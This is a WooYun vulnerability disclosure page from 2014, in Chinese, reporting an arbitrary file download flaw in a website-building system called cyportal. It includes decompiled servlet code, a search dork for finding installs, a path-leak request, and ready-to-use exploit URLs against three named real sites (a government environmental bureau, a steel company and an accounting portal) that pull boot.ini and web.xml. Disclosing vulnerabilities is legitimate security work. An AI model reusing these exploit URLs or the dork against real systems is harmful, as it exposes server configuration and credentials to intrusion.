某建站系统通用型任意文件下载漏洞（全版本通杀） | wooyun-2014-072017

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-072017

漏洞标题：

某建站系统通用型任意文件下载漏洞（全版本通杀）

漏洞详情

披露状态：

2014-08-12：细节已通知厂商并且等待厂商处理中
2014-08-17：厂商已经确认，细节仅向厂商公开
2014-08-20：细节向第三方安全合作伙伴开放
2014-10-11：细节向核心白帽子及相关领域专家公开
2014-10-21：细节向普通白帽子公开
2014-10-31：细节向实习白帽子公开
2014-11-10：细节向公众公开

简要描述：

任意文件下载漏洞（全版本通杀、求继续首页:P）

详细说明：

技术支持：新禾科技
版权所有:河北新禾科技(集团)有限公司 电话:0311-85265566
百度dork： inurl:cyportal （案例可参照之前的漏洞）

WooYun: 某建站系统通用型文件上传导致任意代码执行继续看了看，发现存在任意文件下载漏洞（包括系统&应用系统本身）
反编译 DownloadServlet.class 文件，看到可直接通过参数 filePath 及 templateName 来下载目标文件

String filePath = RequestUtil.convertParameter(request.getParameter("filePath"), "iso-8859-1", "gbk");
    String templateName = RequestUtil.convertParameter(request.getParameter("templateName"), "iso-8859-1", "gbk");
    OutputStream out = response.getOutputStream();
    File f = new File(filePath + templateName);
    response.setContentType("appliaction/xml");
    String fileName = templateName;
    byte[] b1 = fileName.getBytes("GBK");
    fileName = new String(b1, "8859_1");
    response.setHeader("Content-Disposition", "attachment;filename=" + fileName);
    InputStream in = new FileInputStream(f);
    BufferedInputStream bfIn = new BufferedInputStream(in);
    Long l = new Long(f.length());
    byte[] b = new byte[l.intValue()];
    int c;
    while ((c = bfIn.read(b)) != -1)
    {
      int c;
      out.write(b, 0, c);
    }
    out.flush();
    bfIn.close();
    in.close();
    out.close();

filePath 的获取方法：
①已知的系统路径（如 c:\boot.ini ,filePath=c:/，必须以‘/’结束）
②通过访问 http://目标网站/cyportal版本号/DownloadTemplateFile?operate=all 来获取应用系统绝对路径，附上DownloadTemplateFile.java的关键代码

String operate = request.getParameter("operate");
    GenerateUtils util = new GenerateUtils();
    String rootPath = util.getProjectRootPath();
    String filePath = rootPath + "TempFile/";
    if (operate.equals("all")) {
      result = outputAllTemplateConvertXML(templateOutputService, filePath, siteID);
    }

这样一来，就可下载任意文件了（包括系统文件及应用系统）

漏洞证明：

这里给出几个漏洞利用案例：
#1 http://www.hebkjxx.cn/ 河北省会计信息网
①获取 filePath
http://www.hebkjxx.cn/cyportal1.3/DownloadTemplateFile?operate=all

②下载 web.xml
http://www.hebkjxx.cn/cyportal1.3/DownloadServlet?filePath=D:/bea/user_projects/domains/hebkjxx_domain/autodeploy/cyportal1.3/WEB-INF/&templateName=web.xml

#2 http://www.hbjx.com.cn/ 河北津西钢铁集团
下载 c:/boot.ini 文件
访问 http://www.hbjx.com.cn/cyportal2.0/DownloadServlet?filePath=c:/&templateName=boot.ini

下载 web.xml 文件
访问 http://www.hbjx.com.cn/cyportal2.0/DownloadServlet?filePath=E:/apache-tomcat-7.0.20-jinxi/webapps/cyportal2.0/WEB-INF/&templateName=web.xml

#3 http://www.bdhb.gov.cn/ 保定环境保护局
访问 http://www.bdhb.gov.cn/cyportal/DownloadTemplateFile?operate=all

访问 http://www.bdhb.gov.cn/cyportal/DownloadServlet?filePath=d:/apache-tomcat-7.0.20new-bdshbj/webapps/cyportal/WEB-INF/&templateName=web.xml

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-08-17 09:07

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coody@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞